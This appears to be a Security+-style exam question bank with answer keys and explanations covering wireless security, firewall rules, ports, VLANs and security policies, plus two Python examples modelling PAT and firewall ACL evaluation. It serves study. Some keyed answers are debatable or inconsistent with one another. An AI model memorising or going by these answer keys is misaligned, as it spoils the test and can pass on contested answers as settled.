The security administrator has been tasked to update all the access points to provide a more secure connection. All access points currently use WPA TKIP for encryption. Which of the following would be configured to provide more secure connections?
A. WEP
B. WPA2 CCMP
C. Disable SSID broadcast and increase power levels
D. MAC filtering

Answer: B
Explanation: CCMP makes use of 128-bit AES encryption with a 48-bit packet number as its nonce, replacing the RC4-based TKIP; moving from WPA TKIP to WPA2 CCMP is the upgrade path.

A system administrator wants to enable WPA2 CCMP. Which of the following is the only encryption used?
A. RC4
B. DES
C. 3DES
D. AES

Answer: D
Explanation: Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) makes use of 128-bit AES encryption with a 48-bit packet number as its nonce; AES is the only cipher it uses.

Jane, an administrator, needs to make sure the wireless network is not accessible from theparking area of their office. Which of the following would BEST help Jane when deploying a newaccess point?


A. Placement of antenna
B. Disabling the SSID
C. Implementing WPA2
D. Enabling the MAC filtering

Answer: A
Explanation: You should try to avoid placing access points near metal (which includes appliances) or near the ground. Placing them in the center of the area to be served and high enough to get around most obstacles is recommended. If the signal still travels too far, some access points include power level controls, which allow you to reduce the amount of output provided.

A security team has identified that the wireless signal is broadcasting into the parking lot. To reduce the risk of an attack against the wireless network from the parking lot, which of the following controls should be used? (Select TWO).
A. Antenna placement
B. Interference
C. Use WEP
D. Single sign-on
E. Disable the SSID
F. Power levels

Answer: A, F
Explanation: Placing the antenna in the correct position is crucial. You can then adjust the power levels to exclude the parking lot.

Which of the following would Pete, a security administrator, do to limit a wireless signal from penetrating the exterior walls?
A. Implement TKIP encryption
B. Consider antenna placement
C. Disable the SSID broadcast
D. Disable WPA

Answer: B
Explanation: Cinderblock walls, metal cabinets, and other barriers can reduce signal strength significantly. Therefore, antenna placement is critical.

Ann, a security administrator, has concerns regarding her company's wireless network. The network is open and available for visiting prospective clients in the conference room, but she notices that many more devices are connecting to the network than should be. Which of the following would BEST alleviate Ann's concerns with minimum disturbance of current functionality for clients?
A. Enable MAC filtering on the wireless access point.
B. Configure WPA2 encryption on the wireless access point.
C. Lower the antenna's broadcasting power.
D. Disable SSID broadcasting

Answer: C
Explanation: Some access points include power level controls that allow you to reduce the amount of output provided if the signal is traveling too far; lowering the power keeps the open network usable in the conference room without requiring any client to be reconfigured.

After reviewing the firewall logs of her organization's wireless APs, Ann discovers an unusually high amount of failed authentication attempts in a particular segment of the building. She remembers that a new business moved into the office space across the street. Which of the following would be the BEST option to begin addressing the issue?
A. Reduce the power level of the AP on the network segment
B. Implement MAC filtering on the AP of the affected segment
C. Perform a site survey to see what has changed on the segment
D. Change the WPA2 encryption key of the AP in the affected segment

Answer: A
Explanation: Some access points include power level controls that allow you to reduce the amount of output provided if the signal is traveling too far; here the signal reaches the neighbouring business, whose devices are attempting to join.

An administrator wants to establish a WiFi network using a high gain directional antenna with a narrow radiation pattern to connect two buildings separated by a very long distance. Which of the following antennas would be BEST for this situation?
A. Dipole
B. Yagi
C. Sector
D. Omni

Answer: B
Explanation: A Yagi-Uda antenna, commonly known simply as a Yagi antenna, is a directional antenna consisting of multiple parallel dipole elements in a line, usually made of metal rods. It consists of a single driven element connected to the transmitter or receiver with a transmission line, and additional parasitic elements: a so-called reflector and one or more directors. The reflector element is slightly longer than the driven dipole, whereas the directors are a little shorter. This design achieves a very substantial increase in the antenna's directionality and gain compared to a simple dipole.

A company has recently implemented a high density wireless system by having a junior technician install two new access points for every access point already deployed. Users are now reporting random wireless disconnections and slow network connectivity. Which of the following is the MOST likely cause?
A. The old APs use 802.11a
B. Users did not enter the MAC of the new APs
C. The new APs use MIMO
D. A site survey was not conducted

Answer: D
Explanation: AP placement and channel assignment should be verified with a site survey before deployment. Tripling the AP count without one produces overlapping cells and co-channel interference, which cause exactly the disconnections and poor throughput reported.

A Windows-based computer is infected with malware and is running too slowly to boot and run a malware scanner. Which of the following is the BEST way to run the malware scanner?
A. Kill all system processes
B. Enable the firewall
C. Boot from CD/USB
D. Disable the network connection

Answer: C
Explanation: Antivirus companies frequently create boot discs you can use to scan and repair your computer. These tools can be burned to a CD or DVD or installed onto a USB drive. You can then restart your computer and boot from the removable media. A special antivirus environment will load where your computer can be scanned and repaired, with the infected operating system (and any rootkit it is running) not in control.
Incorrect Options:
A: Killing all system processes will stop system processes and could have a negative effect on the system. It is not the BEST way to run the malware scanner.
B: The basic purpose of a firewall is to isolate one network from another. It is not the BEST way to run the malware scanner.
D: Disabling the network connection does nothing to help run the malware scanner.
Reference:
http://www.howtogeek.com/187037/how-to-scan-and-repair-a-badly-infected-computer-from-outside-windows/
Dulaney, Emmett and Chuck Easttom, CompTIA Security+ Study Guide, 6th Edition, Sybex, Indianapolis, 2014, p. 342

A company administrator has a firewall with an outside interface connected to the Internet and an inside interface connected to the corporate network. Which of the following should the administrator configure to redirect traffic destined for the default HTTP port on the outside interface to an internal server listening on port 8080?
A. Create a dynamic PAT from port 80 on the outside interface to the internal interface on port 8080
B. Create a dynamic NAT from port 8080 on the outside interface to the server IP address on port 80
C. Create a static PAT from port 80 on the outside interface to the internal interface on port 8080
D. Create a static PAT from port 8080 on the outside interface to the server IP address on port 80

Answer: C
Explanation: Static PAT translations allow a specific UDP or TCP port on a global address to be translated to a specific port on a local address. In this case, the default HTTP port (80) on the outside (global) address is translated to port 8080 on the internal server. Because the mapping is static, it exists before any connection is made, which is what unsolicited inbound traffic from the Internet requires.
Incorrect Options:
A: Dynamic PAT maps many inside addresses to one outside address by assigning an outside port per outbound flow; the mappings are created by outbound traffic and cannot provide a fixed inbound mapping for port 80.
B: Dynamic NAT translates a group of real addresses to a pool of mapped addresses that are routable on the destination network and does not translate ports. The question also states that the internal server is listening on port 8080, not 80.
D: The ports are reversed: the outside traffic arrives on port 80 and the internal server is listening on port 8080.
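The difference between the static mapping option C describes and the dynamic PAT of option A, as an added example that is not part of the original card set. The outside address, inside hosts and ports are constructed; the table is a minimal model and, unlike a real firewall, never ages out its dynamic entries.

```python
"""Static PAT (port forward) beside dynamic PAT (many-to-one hide NAT), added example, not from the page."""


class PatTable:
    """One outside address shared by an inside network, with static and dynamic port mappings."""

    def __init__(self, outside_ip: str, ephemeral_start: int = 1024):
        self.outside_ip = outside_ip
        self.static = {}    # (proto, outside_port) -> (inside_ip, inside_port), configured by hand
        self.dynamic = {}   # (proto, inside_ip, inside_port) -> outside_port, created by outbound flows
        self.reverse = {}   # (proto, outside_port) -> (inside_ip, inside_port), used for replies
        self.next_port = ephemeral_start

    def _outside_port_in_use(self, proto: str, port: int) -> bool:
        return (proto, port) in self.static or (proto, port) in self.reverse

    def add_static(self, proto: str, outside_port: int, inside_ip: str, inside_port: int) -> None:
        """Static PAT: a fixed translation that exists before any traffic, so inbound connections can use it."""
        if self._outside_port_in_use(proto, outside_port):
            raise ValueError(f"{proto}/{outside_port} on {self.outside_ip} is already mapped")
        self.static[(proto, outside_port)] = (inside_ip, inside_port)

    def translate_inbound(self, proto: str, dst_ip: str, dst_port: int):
        """A packet arriving on the outside interface: the inside (ip, port) to rewrite to, or None to drop."""
        if dst_ip != self.outside_ip:
            return None
        if (proto, dst_port) in self.static:
            return self.static[(proto, dst_port)]
        return self.reverse.get((proto, dst_port))   # a reply to an existing outbound flow, or None

    def translate_outbound(self, proto: str, src_ip: str, src_port: int):
        """Dynamic PAT: every new inside (ip, port) pair is given its own free outside port."""
        key = (proto, src_ip, src_port)
        if key not in self.dynamic:
            while self._outside_port_in_use(proto, self.next_port):
                self.next_port += 1
            if self.next_port > 65535:
                raise RuntimeError("outside port pool exhausted")
            self.dynamic[key] = self.next_port
            self.reverse[(proto, self.next_port)] = (src_ip, src_port)
            self.next_port += 1
        return self.outside_ip, self.dynamic[key]
```

Note that `translate_inbound` drops anything that matches neither a static entry nor a reply slot, which is the property that makes the static mapping necessary for the web server in the question.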

An overseas branch office within a company has many more technical and non-technical security incidents than other parts of the company. Which of the following management controls should be introduced to the branch office to improve their state of security?
A. Initial baseline configuration snapshots
B. Firewall, IPS and network segmentation
C. Event log analysis and incident response
D. Continuous security monitoring processes
Answer: D
Explanation: Continuous monitoring may involve regular measurements of network traffic levels, routine evaluations for regulatory compliance, and checks of network security device configurations. It also points toward the never-ending review of what resources a user actually accesses, which is critical for preventing insider threats.

Incorrect Options:
A: An initial baseline configuration snapshot would allow the standardized minimal level of security that all systems in an organization must comply with to be enforced. This will not cover the non-technical security incidents.
B: A firewall, IPS and network segmentation will offer technical protection, but no protection against non-technical security incidents.
C: Event log analysis and incident response will not cover the non-technical security incidents.

Which of the following is a directional antenna that can be used in point-to-point or point-to-multipoint WiFi communication systems? (Select TWO).
A. Backfire
B. Dipole
C. Omni
D. PTZ
E. Dish
Answer: A, E
Explanation: Both the backfire and the dish antennas are high-gain antenna types that transmit a narrow beam of signal. They are used mainly for point-to-point links, and an antenna with a somewhat wider beam, such as a backfire, can also serve point-to-multipoint coverage over shorter distances. Dipole and omni antennas radiate in all directions, and PTZ (pan-tilt-zoom) is a camera mount, not an antenna.
Which of the following would be MOST appropriate to secure an existing SCADA system by preventing connections from unauthorized networks?
A. Implement a HIDS to protect the SCADA system
B. Implement a Layer 2 switch to access the SCADA system
C. Implement a firewall to protect the SCADA system
D. Implement a NIDS to protect the SCADA system
Answer: C
Explanation: Firewalls manage traffic using filters, which are just a rule or set of rules. A recommended guideline for firewall rules is "deny by default; allow by exception". This means that if a network connection is not specifically allowed, it will be denied. A HIDS or NIDS only detects and reports; it does not block connections.
The common method of breaking larger network address space into smaller networks is known as:
A. subnetting.
B. phishing.
C. virtualization.
D. packet filtering.
Answer: A
Explanation: Subnetting is a dividing process used on networks to divide larger groups of hosts into smaller collections by lengthening the network prefix (for example, splitting 10.1.0.0/22 into four /24 networks).
While securing a network it is decided to allow active FTP connections into the network. Which of the following ports MUST be configured to allow active FTP connections? (Select TWO).
A. 20
B. 21
C. 22
D. 68
E. 69
Answer: A, B
Explanation: FTP (File Transfer Protocol) makes use of ports 20 and 21: the client opens the control connection to TCP port 21, and in active mode the server opens the data connection back to the client from TCP port 20, which is why both ports must be allowed.
An administrator needs to secure a wireless network and restrict access based on the hardware address of the device. Which of the following solutions should be implemented?
A. Use a stateful firewall
B. Enable MAC filtering
C. Upgrade to WPA2 encryption
D. Force the WAP to use channel 1
Answer: B
Explanation: MAC addresses are also known as an Ethernet hardware address (EHA), hardware address or physical address. Enabling MAC filtering would allow a WAP to restrict or allow access based on the hardware address of the device.
A security administrator must implement a firewall rule to allow remote employees to VPN onto the company network. The VPN concentrator implements SSL VPN over the standard HTTPS port. Which of the following is the MOST secure ACL to implement at the company's gateway firewall?
A. PERMIT TCP FROM ANY 443 TO 199.70.5.25 443
B. PERMIT TCP FROM ANY ANY TO 199.70.5.23 ANY
C. PERMIT TCP FROM 199.70.5.23 ANY TO ANY ANY
D. PERMIT TCP FROM ANY 1024-65535 TO 199.70.5.23 443
Answer: D
Explanation: The default HTTPS port is 443. Remote clients connect from any source address using an ephemeral source port, which falls in the 1024-65535 range, to the concentrator's address on destination port 443. Option D permits exactly that and nothing more. Option A is wrong because clients do not use 443 as their source port, option B exposes every port on the concentrator, and option C is an outbound rule from the concentrator rather than an inbound rule for the employees.
It is MOST important to make sure that the firewall is configured to do which of the following?
A. Alert management of a possible intrusion.
B. Deny all traffic and only permit by exception.
C. Deny all traffic based on known signatures.
D. Alert the administrator of a possible intrusion

Answer: B
Explanation: Firewalls manage traffic using filters, which are just a rule or set of rules. A recommended guideline for firewall rules is "deny by default; allow by exception": rules are evaluated in order, and traffic that matches none of them falls through to the implicit deny at the end of the list.
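Ordered rule evaluation with an implicit deny, as an added example that is not part of the original card set; it also serves the SSL VPN ACL card and the SCADA firewall card above. The parser accepts the PERMIT/DENY FROM/TO syntax those cards use; the probe packets, the SCADA subnet and all addresses other than the concentrator's 199.70.5.23 are constructed (203.0.113.0/24 is a documentation range).

```python
"""Ordered firewall ACL with implicit deny (added example, not from the page)."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    proto: str   # "TCP", "UDP", ...
    src: str
    sport: int
    dst: str
    dport: int


def _parse_net(token: str):
    """ANY matches every address; anything else is a host or CIDR prefix."""
    return None if token.upper() == "ANY" else ipaddress.ip_network(token, strict=False)


def _parse_ports(token: str):
    """ANY, a single port, or an inclusive lo-hi range."""
    if token.upper() == "ANY":
        return 0, 65535
    lo, _, hi = token.partition("-")
    return int(lo), int(hi or lo)


def parse_acl(text: str):
    """Rule syntax from the cards: PERMIT TCP FROM <src> <sport> TO <dst> <dport>. Order is preserved."""
    rules = []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        if len(parts) != 8 or parts[2].upper() != "FROM" or parts[5].upper() != "TO":
            raise ValueError(f"malformed rule: {raw!r}")
        action, proto, _, src, sport, _, dst, dport = parts
        if action.upper() not in ("PERMIT", "DENY"):
            raise ValueError(f"unknown action: {raw!r}")
        rules.append((action.upper(), proto.upper(), _parse_net(src), _parse_ports(sport),
                      _parse_net(dst), _parse_ports(dport)))
    return rules


def _in_net(net, addr: str) -> bool:
    return net is None or ipaddress.ip_address(addr) in net


def evaluate(rules, pkt: Packet) -> str:
    """First matching rule wins. A packet that matches nothing hits the implicit 'deny ip any any'."""
    for action, proto, src, sport, dst, dport in rules:
        if proto not in ("IP", pkt.proto.upper()):
            continue
        if (_in_net(src, pkt.src) and sport[0] <= pkt.sport <= sport[1]
                and _in_net(dst, pkt.dst) and dport[0] <= pkt.dport <= dport[1]):
            return action
    return "DENY"


# The two candidate rules from the SSL VPN card (its options D and B).
VPN_ACL_D = "PERMIT TCP FROM ANY 1024-65535 TO 199.70.5.23 443"
VPN_ACL_B = "PERMIT TCP FROM ANY ANY TO 199.70.5.23 ANY"

# Constructed probes from one Internet host.
PROBES = [
    Packet("TCP", "203.0.113.5", 51000, "199.70.5.23", 443),   # legitimate SSL VPN client
    Packet("TCP", "203.0.113.5", 51001, "199.70.5.23", 22),    # SSH probe of the concentrator
    Packet("TCP", "203.0.113.5", 51002, "199.70.5.23", 8443),  # probe of a management port
    Packet("UDP", "203.0.113.5", 51003, "199.70.5.23", 443),   # wrong protocol
    Packet("TCP", "203.0.113.5", 51004, "199.70.5.24", 443),   # neighbouring host
]


def permitted(acl_text: str):
    """Which (proto, dst, dport) triples from PROBES a given ACL lets through."""
    rules = parse_acl(acl_text)
    return [(p.proto, p.dst, p.dport) for p in PROBES if evaluate(rules, p) == "PERMIT"]
```

Running `permitted` on both VPN candidates shows why option D is the "most secure" choice: it admits only the VPN flow, while option B also admits the SSH and management-port probes.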
An administrator needs to secure RADIUS traffic between two servers. Which of the following is the BEST solution?
A. Require IPSec with AH between the servers
B. Require the message-authenticator attribute for each message
C. Use MSCHAPv2 with MPPE instead of PAP
D. Require a long and complex shared secret for the servers
Answer: A
Explanation: IPsec is used for a secure point-to-point connection traversing an insecure network such as the Internet. Authentication Header (AH) is a primary IPsec protocol that provides authentication and integrity of the sender's data, protecting the RADIUS exchange from tampering and spoofing. Note that AH does not encrypt; if the RADIUS attributes themselves must stay confidential (RADIUS's own shared-secret obfuscation of passwords is weak), ESP should be used instead of, or in addition to, AH.

Ann, the Chief Information Officer (CIO) of a company, sees cloud computing as a way to save money while providing valuable services. She is looking for a cost-effective solution to assist in capacity planning as well as visibility into the performance of the network. Which of the following cloud technologies should she look into?



A. IaaS


B. MaaS


C. SaaS


D. PaaS

Answer: B


Explanation: Monitoring-as-a-service (MaaS) is a cloud delivery model that falls under anything as a service (XaaS). MaaS allows for the deployment of monitoring functionalities for several other services and applications within the cloud, giving the visibility into capacity and network performance the CIO wants without building a monitoring platform in-house.

Ann, the network administrator, is receiving reports regarding a particular wireless network in the building. The network was implemented for specific machines issued to the developer department, but the developers are stating that they are having connection issues as well as slow bandwidth. Reviewing the wireless router's logs, she sees that devices not belonging to the developers are connecting to the access point. Which of the following would BEST alleviate the developers' reports?
A. Configure the router so that wireless access is based upon the connecting device's hardware address.
B. Modify the connection's encryption method so that it is using WEP instead of WPA2.
C. Implement connections via secure tunnel with additional software on the developers' computers.
D. Configure the router so that its name is not visible to devices scanning for wireless networks.
Answer: A
Explanation: MAC addresses are also known as an Ethernet hardware address (EHA), hardware address or physical address. Enabling MAC filtering would allow the WAP to restrict access to the specific machines issued to the developers, keeping the other devices off the access point.
An organization recently switched from a cloud-based email solution to an in-house email server. The firewall needs to be modified to allow for sending and receiving email. Which of the following ports should be open on the firewall to allow for email traffic? (Select THREE).
A. TCP 22
B. TCP 23
C. TCP 25
D. TCP 53
E. TCP 110
F. TCP 143
G. TCP 445
Answer: C, E, F
Explanation: Port 25 is used by Simple Mail Transfer Protocol (SMTP) for routing e-mail between mail servers. Port 110 is used for Post Office Protocol v3 (POP3), which is an application-layer Internet standard protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection. Port 143 is used by Internet Message Access Protocol (IMAP) for the management of email messages.
A technician wants to securely collect network device configurations and statistics through a scheduled and automated process. Which of the following should be implemented if configuration integrity is most important and a credential compromise should not allow interactive logons?
A. SNMPv3
B. TFTP
C. SSH
D. TLS
Answer: A
Explanation: SNMPv3 provides the following security features:
Message integrity: ensures that a packet has not been tampered with in transit.
Authentication: determines that the message is from a valid source.
Encryption: scrambles the content of a packet to prevent it from being learned by an unauthorized source.
Unlike SSH, SNMPv3 credentials grant only management-protocol access, so their compromise does not yield an interactive shell on the device.
A security administrator is tasked with ensuring that all devices have updated virus definition files before they are allowed to access network resources. Which of the following technologies would be used to accomplish this goal?
A. NIDS
B. NAC
C. DLP
D. DMZ
E. Port Security
Answer: B
Explanation: Network Access Control (NAC) means controlling access to an environment through strict adherence to and implementation of security policies, including a posture check (such as current antivirus definitions) before a device is admitted.
The loss prevention department has purchased a new application that allows the employees to monitor the alarm systems at remote locations. However, the application fails to connect to the vendor's server and the users are unable to log in. Which of the following are the MOST likely causes of this issue? (Select TWO).
A. URL filtering
B. Role-based access controls
C. MAC filtering
D. Port Security
E. Firewall rules
Answer: A, E
Explanation: A URL filter is used to block URLs (websites) to prevent users accessing the website. Firewall rules act like ACLs, and they are used to dictate what traffic can pass between the firewall and the internal network. Three possible actions can be taken based on the rule's criteria:
Block the connection
Allow the connection
Allow the connection only if it is secured
Incorrect Options:
B: Role-based access control is based on a user's job description. When a user is assigned a specific role in an environment, that user's access to objects is granted based on the required tasks of that role. It governs access to objects inside the organization, not whether the application can reach the vendor's server.
C: A MAC filter is a list of authorized wireless client interface MAC addresses that is used by a WAP to block access to all unauthorized devices.
D: Port security works at layer 2 of the OSI model and allows an administrator to configure switch ports so that only certain MAC addresses can use the port.
Reference:
Stewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, pp. 19, 61, 276
Dulaney, Emmett and Chuck Easttom, CompTIA Security+ Study Guide, 6th Edition, Sybex, Indianapolis, 2014, p. 157
Ann is an employee in the accounting department and would like to work on files from her home computer. She recently heard about a new personal cloud storage service with an easy web interface. Before uploading her work related files into the cloud for access, which of the following is the MOST important security concern Ann should be aware of?
A. Size of the files
B. Availability of the files
C. Accessibility of the files from her mobile device
D. Sensitivity of the files
Answer: D
Explanation: Cloud computing has privacy concerns, regulation compliance difficulties, questions over the use of open- or closed-source solutions, and adoption of open standards. It is also unsure whether cloud-based data is actually secured (or even securable), so the sensitivity of accounting files placed in a personal service outside the organization's control is the primary concern.

An Active Directory setting restricts querying to only secure connections. Which of the following ports should be selected to establish a successful connection?


A. 389


B. 440


C. 636


D. 3286

Answer: C


Explanation: Port 636 is used for secure LDAP (LDAPS), LDAP over TLS.
Incorrect Options:
A: Port 389 is used for plain LDAP.
B: Port 440 is not used for secure Active Directory connections.
D: Port 3286 is not used for secure Active Directory connections.



Reference:
Dulaney, Emmett and Chuck Easttom, CompTIA Security+ Study Guide, 6th Edition, Sybex, Indianapolis, 2014, p. 147
https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers

Signed digital certificates used to secure communication with a web server are MOST commonly associated with which of the following ports?
A. 25
B. 53
C. 143
D. 443
Answer: D
Explanation: HTTPS authenticates the website and corresponding web server with which one is communicating, using the server's signed certificate. HTTPS makes use of port 443.
Incorrect Options:
A: Port 25 is used by Simple Mail Transfer Protocol (SMTP) for routing e-mail between mail servers.
B: Port 53 is used by Domain Name System (DNS).
C: Port 143 is used by Internet Message Access Protocol (IMAP) for the management of email messages.
Reference:
https://en.wikipedia.org/wiki/HTTPS
https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
An organization has three divisions: Accounting, Sales, and Human Resources. Users in the Accounting division require access to a server in the Sales division, but no users in the Human Resources division should have access to resources in any other division, nor should any users in the Sales division have access to resources in the Accounting division. Which of the following network segmentation schemas would BEST meet this objective?
A. Create two VLANs, one for Accounting and Sales, and one for Human Resources.
B. Create one VLAN for the entire organization.
C. Create two VLANs, one for Sales and Human Resources, and one for Accounting.
D. Create three separate VLANs, one for each division.
Answer: D
Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function, where an ACL can permit the one-way Accounting-to-Sales access while all other inter-division traffic is denied.
A retail store uses a wireless network for its employees to access inventory from anywhere in the store. Due to concerns regarding the aging wireless network, the store manager has brought in a consultant to harden the network. During the site survey, the consultant discovers that the network was using WEP encryption. Which of the following would be the BEST course of action for the consultant to recommend?
A. Replace the unidirectional antenna at the front of the store with an omni-directional antenna.
B. Change the encryption used so that the encryption protocol is CCMP-based.
C. Disable the network's SSID and configure the router to only access store devices based on MAC addresses.
D. Increase the access point's encryption from WEP to WPA TKIP
Answer: B
Explanation: CCMP is the standard encryption protocol for use with the WPA2 standard and is much more secure than the WEP protocol and the TKIP protocol of WPA. CCMP provides the following security services:
Data confidentiality: ensures only authorized parties can access the information.
Authentication: provides proof of the genuineness of the sender.
Access control in conjunction with layer management.
Incorrect Options:
A: The antenna type deals with signal strength and direction. It has no bearing on the strength of the encryption.
C: This option would "cloak" the network, not harden it.
D: WPA2, which uses CCMP as its standard encryption protocol, is more secure than WPA-TKIP; TKIP was only a stopgap for WEP-era hardware and retains RC4.
Reference:
http://en.wikipedia.org/wiki/CCMP
http://en.wikipedia.org/wiki/Wi-Fi_Protected_Access
Stewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, pp. 61, 63
A server is configured to communicate on both VLAN 1 and VLAN 12. VLAN 1 communication works fine, but VLAN 12 does not. Which of the following MUST happen before the server can communicate on VLAN 12?


A. The server's network switch port must be enabled for 802.11x on VLAN 12.


B. The server's network switch port must use VLAN Q-in-Q for VLAN 12.


C. The server's network switch port must be 802.1q untagged for VLAN 12.


D. The server's network switch port must be 802.1q tagged for VLAN 12.

Answer: D
Explanation: 802.1q is a standard that defines a system of VLAN tagging for Ethernet frames. The purpose of a tagged port is to pass traffic for multiple VLANs.
Incorrect Options:
A: 802.11x provides an authentication mechanism to devices wishing to attach to a LAN or WLAN.
B: VLAN Q-in-Q allows multiple VLAN tags to be inserted into a single frame.
C: The purpose of an untagged port is to accept traffic for a single VLAN only.
Reference:
https://en.wikipedia.org/wiki/IEEE_802.1Q
https://documentation.meraki.com/zGeneral_Administration/Tools_and_Troubleshooting/Fundamentals_of_802.1Q_VLAN_Tagging
https://en.wikipedia.org/wiki/IEEE_802.1X
https://en.wikipedia.org/wiki/IEEE_802.1ad

Three of the primary security control types that can be implemented are:




A. Supervisory, subordinate, and peer.


B. Personal, procedural, and legal.


C. Operational, technical, and management.


D. Mandatory, discretionary, and permanent.

Answer: C
Explanation: The National Institute of Standards and Technology (NIST) places controls into various types. The control types fall into three categories: Management, Operational, and Technical.

Which of the following technical controls is BEST used to define which applications a user can install and run on a company issued mobile device?


A. Authentication


B. Blacklisting


C. Whitelisting


D. Acceptable use policy

Answer: C
Explanation: White lists are closely related to ACLs and essentially, a white list is a list of items that are allowed.

To help prevent unauthorized access to PCs, a security administrator implements screen savers that lock the PC after five minutes of inactivity. Which of the following controls is being described in this situation?


A. Management


B. Administrative


C. Technical


D. Operational

Answer: C
Explanation: Controls such as preventing unauthorized access to PCs and applying screensavers that lock the PC after five minutes of inactivity are technical controls, the same as Identification and Authentication, Access Control, Audit and Accountability, as well as System and Communication Protection.

Which of the following is a management control?


A. Logon banners


B. Written security policy


C. SYN attack prevention


D. Access Control List (ACL)

Answer: B
Explanation: Management control types include risk assessment, planning, systems and services acquisition, as well as certification, accreditation and security assessment; a written security policy falls in this category.

Which of the following can result in significant administrative overhead from incorrect reporting?


A. Job rotation


B. Acceptable usage policies


C. False positives


D. Mandatory vacations

Answer: C
Explanation: False positives are essentially events that are mistakenly flagged and are not really events to be concerned about. This causes a significant administrative overhead because the reporting is what results in the false positives.

A vulnerability scan is reporting that patches are missing on a server. After a review, it is determined that the application requiring the patch does not exist on the operating system. Which of the following describes this cause?

A. Application hardening


B. False positive


C. Baseline code review


D. False negative

Answer: B
Explanation: False positives are essentially events that are mistakenly flagged and are not really events to be concerned about.

Ann, a security technician, is reviewing the IDS log files. She notices a large number of alerts for multicast packets from the switches on the network. After investigation, she discovers that this is normal activity for her network. Which of the following BEST describes these results?


A. True negatives


B. True positives


C. False positives


D. False negatives

Answer: C
Explanation: False positives are essentially events that are mistakenly flagged and are not really events to be concerned about.

Which of the following is an example of a false negative?


A. The IDS does not identify a buffer overflow.


B. Anti-virus identifies a benign application as malware.


C. Anti-virus protection interferes with the normal operation of an application.


D. A user account is locked out after the user mistypes the password too many times.

Answer: A
Explanation: With a false negative, you are not alerted to a situation when you should be alerted.

A company storing data on a secure server wants to ensure it is legally able to dismiss and prosecute staff who intentionally access the server via Telnet and illegally tamper with customer data. Which of the following administrative controls should be implemented to BEST achieve this?


A. Command shell restrictions


B. Restricted interface


C. Warning banners


D. Session output pipe to /dev/null

Answer: C
Explanation: Within Microsoft Windows, you have the ability to put signs (in the form of onscreen pop-up banners) that appear before the login telling similar information: authorized access only, violators will be prosecuted, and so forth. Such banners convey warnings or regulatory information to the user that they must "accept" in order to use the machine or network. You need to make staff aware that they may legally be prosecuted, and a message is best given via a banner so that all staff using workstations will get notification.

Joe, a security analyst, asks each employee of an organization to sign a statement saying that they understand how their activities may be monitored. Which of the following BEST describes this statement? (Select TWO).

A. Acceptable use policy


B. Risk acceptance policy


C. Privacy policy


D. Email policy


E. Security policy

Answer: A,C
Explanation: Privacy policies define what controls are required to implement and maintain the sanctity of data privacy in the work environment. A privacy policy is a legal document that outlines how data collected is secured. It should encompass information regarding the information the company collects, privacy choices you have based on your account, potential information sharing of your data with other parties, security measures in place, and enforcement.
Acceptable use policies (AUPs) describe how the employees in an organization can use company systems and resources, both software and hardware.

Joe, a newly hired employee, has a corporate workstation that has been compromised due to several visits to P2P sites. Joe insisted that he was not aware of any company policy that prohibits the use of such web sites. Which of the following is the BEST method to deter employees from the improper use of the company's information systems?


A. Acceptable Use Policy


B. Privacy Policy


C. Security Policy


D. Human Resource Policy

Answer: A
Explanation: Acceptable use policies (AUPs) describe how the employees in an organization can use company systems and resources, both software and hardware.

Pete, a security analyst, has been informed that the development team has plans to develop an application which does not meet the company's password policy. Which of the following should Pete do NEXT?


A. Contact the Chief Information Officer and ask them to change the company password policy so that the application is made compliant.


B. Tell the application development manager to code the application to adhere to the company's password policy.


C. Ask the application development manager to submit a risk acceptance memo so that the issue can be documented.


D. Inform the Chief Information Officer of non-adherence to the security policy so that the developers can be reprimanded.

Answer: B
Explanation: Since the application is violating the security policy, it should be coded differently to comply with the password policy.

A major security risk with co-mingling of hosts with different security requirements is:


A. Security policy violations.


B. Zombie attacks.


C. Password compromises.


D. Privilege creep.

Answer: A
Explanation: The entire network is only as strong as the weakest host. Thus co-mingling hosts with different security requirements risks security policy violations.

Which of the following provides the BEST explanation regarding why an organization needs to implement IT security policies?


A. To ensure that false positives are identified


B. To ensure that staff conform to the policy


C. To reduce the organizational risk


D. To require acceptable usage of IT systems

Answer: C
Explanation: Once risks have been identified and assessed, there are five possible actions that should be taken. These are: risk avoidance, risk transference, risk mitigation, risk deterrence and risk acceptance. Any time you engage in steps to reduce risk, you are busy with risk mitigation, and implementing IT security policy is a risk mitigation strategy.

Which of the following should Pete, a security manager, implement to reduce the risk of employees working in collusion to embezzle funds from their company?


A. Privacy Policy


B. Least Privilege


C. Acceptable Use


D. Mandatory Vacations

Answer: D
Explanation: A mandatory vacation policy requires all users to take time away from work to refresh. Not only does a mandatory vacation give the employee a chance to refresh, it also gives the company a chance to make sure that others can fill in any gaps in skills, satisfies the need to have replication or duplication at all levels, and provides an opportunity to discover fraud.

Two members of the finance department have access to sensitive information. The company is concerned they may work together to steal information. Which of the following controls could be implemented to discover if they are working together?


A. Least privilege access


B. Separation of duties


C. Mandatory access control


D. Mandatory vacations

Answer: D
Explanation: A mandatory vacation policy requires all users to take time away from work to refresh. A mandatory vacation gives the employee a chance to refresh, but it also gives the company a chance to make sure that others can fill in any gaps in skills and satisfies the need to have replication or duplication at all levels. Mandatory vacations also provide an opportunity to discover fraud. In this case mandatory vacations can prevent the two members from colluding to steal the information that they have access to.

Mandatory vacations are a security control which can be used to uncover which of the following?


A. Fraud committed by a system administrator


B. Poor password security among users


C. The need for additional security staff


D. Software vulnerabilities in vendor code

Answer: A
Explanation: Mandatory vacations also provide an opportunity to discover fraud, apart from the obvious benefits of giving employees a chance to refresh and making sure that others in the company can fill those positions and make the company less dependent on those persons; a sort of replication and duplication at all levels.

While rarely enforced, mandatory vacation policies are effective at uncovering:




A. Help desk technicians with oversight by multiple supervisors and detailed quality control systems.


B. Collusion between two employees who perform the same business function.


C. Acts of incompetence by a systems engineer designing complex architectures as a member of a team.


D. Acts of gross negligence on the part of system administrators with unfettered access to systems and no oversight.

Answer: D
